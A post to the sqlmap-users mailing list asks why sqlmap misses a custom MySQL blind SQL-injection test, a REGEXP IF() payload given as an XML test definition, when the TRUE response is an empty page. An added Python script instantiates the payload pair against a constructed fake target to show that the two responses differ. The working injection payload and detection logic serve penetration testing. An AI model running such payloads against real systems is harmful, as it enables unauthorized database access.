Hi there, I wrote a small payload to test for conditional error-based SQL-injection possibilities:
<!-- Boolean-error-based blind tests - WHERE/HAVING clause -->
<test>
    <title>AND boolean-error-based blind - WHERE or HAVING clause (MySQL)</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>REGEXP IF([INFERENCE],1,"")</vector>
    <request>
        <payload>REGEXP IF([RANDNUM]=[RANDNUM],1,"")</payload>
    </request>
    <response>
        <comparison>REGEXP IF([RANDNUM]=[RANDNUM1],1,"")</comparison>
    </response>
    <details>
        <dbms>MySQL</dbms>
    </details>
</test>
Theoretically it is working - as long as the server is actually
returning content, the injection is detected and works just fine (feel
free to add it to the sqlmap repository, if it is correct :) ). But as
soon as the tested URL is returning an empty page, detection fails.
* With a TRUE request, the server returns a content-length of 0
* With a FALSE request, the server returns the error message
Now ... for my understanding, this is quite a difference, but sqlmap
fails to recognize it, even with "not-string" given. The problem might
be that the server returns a warning during the dynamic check as well.
Is it possible to forbid the usage of ' during this test?
What am I doing wrong? Is there an error in the payload above? Can
sqlmap handle empty pages?
Thanks!
Kind regards,
Sebastian Nerz
--
Sebastian Nerz
Dipl.-Inform.
IT-Security Consultant
mailto:[email protected]
___________________________________________________________
SySS GmbH
Wohlboldstraße 8
72072 Tübingen
Germany
Voice: +49 7071 407856-31
Fax: +49 7071 407856-19
WWW: http://www.syss.de
PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2
Geschaeftsfuehrer Sebastian Schreiber
Registergericht: Amtsgericht Stuttgart / HRB 382420
Steuernummer: 86118 / 55809
_______________________________________________ sqlmap-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/sqlmap-users
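As an added illustration (not part of the post above and not sqlmap's own code), the following Python script shows what the REGEXP IF() vector does on the two sides of the inference and why the two responses the poster describes (a zero-length page for TRUE, a database error for FALSE) are distinguishable by a whole-body comparison. The target is a constructed stub that mimics the poster's server; the MySQL error text is the pre-8.0 wording for an empty REGEXP pattern and is an assumption of this example, as are all function and class names.

```python
"""
Added example, not sqlmap code: instantiate the REGEXP IF([INFERENCE],1,"")
vector with a TRUE and a FALSE comparison (the <payload>/<comparison> pair
from the test definition) and show that an empty TRUE page and an error
FALSE page still compare as different.  The target is a constructed stub.
"""
import random
import re

# MySQL (pre-8.0 regex engine) refuses an empty pattern, which is exactly what
# IF(<false>,1,"") hands to REGEXP.  Error wording assumed for this example.
MYSQL_EMPTY_REGEXP_ERROR = "Got error 'empty (sub)expression' from regexp"


def build_payload(inference: str) -> str:
    """Instantiate the <vector> from the test: REGEXP IF([INFERENCE],1,"")."""
    return f' REGEXP IF({inference},1,"")'


def random_probe_pair():
    """Mirror the <request>/<response> pair: an always-true comparison built
    from one random number and an always-false one from two different
    numbers ([RANDNUM]=[RANDNUM] versus [RANDNUM]=[RANDNUM1])."""
    a = random.randint(1000, 9999)
    b = a + random.randint(1, 999)          # guaranteed b != a
    return build_payload(f"{a}={a}"), build_payload(f"{a}={b}")


class FakeMySQLTarget:
    """Constructed stand-in for the vulnerable page.  It only evaluates the
    IF() inside the injected REGEXP and behaves like the poster's server:
    empty body (Content-Length 0) when the inference is true, the database
    error message when it is false."""
    _if_re = re.compile(r'REGEXP IF\((\d+)=(\d+),1,""\)')

    def get(self, param_value: str) -> str:
        m = self._if_re.search(param_value)
        if m is None:
            return "<html>normal page</html>"      # no injection in the request
        if m.group(1) == m.group(2):
            return ""                              # TRUE: REGEXP 1 is valid, query OK
        # FALSE: REGEXP "" raises in MySQL and the warning lands in the page
        return f"<html>Warning: mysql_fetch_array(): {MYSQL_EMPTY_REGEXP_ERROR}</html>"


def responses_differ(true_body: str, false_body: str) -> bool:
    """The check a blind-injection detector needs: compare the two probe
    responses as whole bodies, so a zero-length TRUE page still differs from
    an error page (and same-length differences are caught as well)."""
    return true_body != false_body


def detect(target, base_value: str = "1") -> dict:
    """Send the TRUE and FALSE probes and report what a detector would see.
    'error_seen' is the --not-string style check: the error text must be
    absent from the TRUE response and present in the FALSE one."""
    true_p, false_p = random_probe_pair()
    t = target.get(base_value + true_p)
    f = target.get(base_value + false_p)
    return {
        "injectable": responses_differ(t, f),
        "true_len": len(t),
        "false_len": len(f),
        "error_seen": (MYSQL_EMPTY_REGEXP_ERROR in f) and (MYSQL_EMPTY_REGEXP_ERROR not in t),
    }


if __name__ == "__main__":
    print(detect(FakeMySQLTarget()))
```

Run stand-alone, the script reports the TRUE probe with a body length of 0, the FALSE probe carrying the regexp error, and the pair as injectable; a page that returned the same warning for both probes (the dynamic-check situation the poster suspects) would make `responses_differ` return False.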
